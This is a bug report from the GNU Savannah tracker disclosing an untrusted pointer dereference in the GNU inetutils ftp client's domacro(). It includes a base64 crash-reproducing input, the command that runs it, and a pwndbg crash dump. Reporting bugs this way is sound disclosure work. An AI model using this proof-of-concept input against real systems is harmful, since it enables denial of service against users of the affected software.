URL: <https://savannah.gnu.org/bugs/?61722>
Summary: Untrusted Pointer Dereference in domacro() at inetutils/ftp/domacro.c:186 Project: GNU Networking Utilities Submitted by: aidai Submitted on: Thu 23 Dec 2021 01:54:14 PM UTC Category: None Severity: 3 - Normal Item Group: None Status: None Privacy: Public Assigned to: None Open/Closed: Open Discussion Lock: Any _______________________________________________________ Details: # Untrusted Pointer Dereference in domacro() at inetutils/ftp/domacro.c:186 ## Description An Untrusted Pointer Dereference was discovered in domacro() at inetutils/ftp/domacro.c:186. The vulnerability causes a segmentation fault and application crash. **version** ``` ./ftp --version ftp (GNU inetutils) 2.2.16-cf091 Copyright (C) 2021 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>. This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Written by many authors. ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz ## Proof of Concept **poc** ``` base64 poc bWEgIAoCCiQkJCQkMiQkJDAkJCQkNTUxNTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1 NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1 NTU1NTU1NTU1NTU1NSQkCQICCgoCAAQJZAD/CgQX6ygKCgocCiQKCQIKCgoAAP////8K//8CCiQK CP8g/3cCCgIACv8= ``` **command:** ``` ./ftp < ./poc ``` **Result** ``` ./ftp < ./poc (macro name) Enter macro line by line, terminating it with a null line ?Invalid command ?Invalid command ?Invalid command (macro name) [1] 2677333 segmentation fault ./ftp < ./poc ``` **gdb** ``` domacro (argc=2, argv=0x55555557e680 <margv>) at domacro.c:186 186 strlen (argv[j + 1]) + 2)) LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x555471c9ada0 RBX 0x555555583646 ◂— 0x24242402 RCX 0x21000 RDX 0xffffffff1c71c720 RDI 0x7ffff7f59b80 (main_arena) ◂— 0x0 RSI 0x411 R8 0x555555583640 ◂— 0x2402242424242424 R9 0xd R10 0x55555557100d ◂— 0x504f4f4e002029 /* ') ' */ R11 0x9 R12 0x555555559f30 (_start) ◂— endbr64 R13 0x7fffffffe220 ◂— 0x1 R14 0x0 R15 0x0 RBP 0x7fffffffe070 —▸ 0x7fffffffe0b0 —▸ 0x7fffffffe130 ◂— 0x0 RSP 0x7fffffffe000 —▸ 0x55555557e680 (margv) —▸ 0x555555572c76 ◂— 0x6c75616665640024 /* '$' */ RIP 0x55555556045a (domacro+815) ◂— mov rax, qword ptr [rax] ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── ► 0x55555556045a <domacro+815> mov rax, qword ptr [rax] 0x55555556045d <domacro+818> mov rdi, rax 0x555555560460 <domacro+821> call strlen@plt <strlen@plt> 0x555555560465 <domacro+826> lea rdx, [rax + 2] 0x555555560469 <domacro+830> lea rax, [rbp - 0x40] 0x55555556046d <domacro+834> mov rcx, rdx 0x555555560470 <domacro+837> lea rdx, [rip + 0x1e2c1] <0x55555557e738> 0x555555560477 <domacro+844> mov rsi, rax 0x55555556047a <domacro+847> lea rdi, [rip + 0x1f6c7] <0x55555557fb48> 0x555555560481 <domacro+854> call lengthen <lengthen> 0x555555560486 <domacro+859> test eax, eax ──────────────────────────────────────────[ SOURCE (CODE) ]─────────────────────────────────────────── In file: /root/disk2/fuzzing/inetutils/inetutils/ftp/domacro.c 181 j = 10 * j + *cp1 - '0'; 182 cp1--; 183 if (argc - 2 >= j) 184 { 185 if (lengthen (&line, &cp2, &linelen, ► 186 strlen (argv[j + 1]) + 2)) 187 { 188 allocflg = 1; 189 goto end_exec; 190 } 191 strcpy (cp2, argv[j + 1]); ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffffe000 —▸ 0x55555557e680 (margv) —▸ 0x555555572c76 ◂— 0x6c75616665640024 /* '$' */ 01:0008│ 0x7fffffffe008 ◂— 0x25556a93e 02:0010│ 0x7fffffffe010 —▸ 0x7ffff7d3b740 ◂— 0x7ffff7d3b740 03:0018│ 0x7fffffffe018 ◂— 0x55583620 /* ' 6XU' */ 04:0020│ 0x7fffffffe020 ◂— 0x2e38e38e3 05:0028│ 0x7fffffffe028 ◂— 0x0 06:0030│ 0x7fffffffe030 —▸ 0x55555558364a ◂— 0x0 07:0038│ 0x7fffffffe038 —▸ 0x55555557eb37 (macbuf+119) ◂— 0xa00020209242435 ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x55555556045a domacro+815 f 1 0x555555566a09 cmdscanner+633 f 2 0x55555556665a main+929 f 3 0x7ffff7d950b3 __libc_start_main+243 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 domacro (argc=2, argv=0x55555557e680 <margv>) at domacro.c:186 #1 0x0000555555566a09 in cmdscanner (top=1) at main.c:461 #2 0x000055555556665a in main (argc=0, argv=0x7fffffffe230) at main.c:310 #3 0x00007ffff7d950b3 in __libc_start_main (main=0x5555555662b9 <main>, argc=1, argv=0x7fffffffe228, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe218) at ../csu/libc-start.c:308 #4 0x0000555555559f5e in _start () ``` _______________________________________________________ Reply to this item at: <https://savannah.gnu.org/bugs/?61722> _______________________________________________ Message sent via Savannah https://savannah.gnu.org/